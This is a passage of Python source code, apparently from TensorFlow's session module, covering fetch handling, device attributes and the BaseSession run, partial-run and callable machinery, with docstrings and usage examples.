"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = feed_handles or {}
self._ops = []
self._fetch_handles = {}
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
          ' Use return values, explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i] in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i]].eval()
else:
value = self._feeds.get(self._fetches[i])
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i])
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
    c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = {}
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
        np_val = np.array(handle.handle, dtype=object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
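  # Example use of `_make_callable_from_options` (a minimal sketch; `sess`,
  # `x`, and `y` are assumed to be an open session and graph tensors):
  #   opts = config_pb2.CallableOptions()
  #   opts.feed.append(x.name)
  #   opts.fetch.append(y.name)
  #   fn = sess._make_callable_from_options(opts)
  #   result = fn(np.ones(x.shape.as_list()))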
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
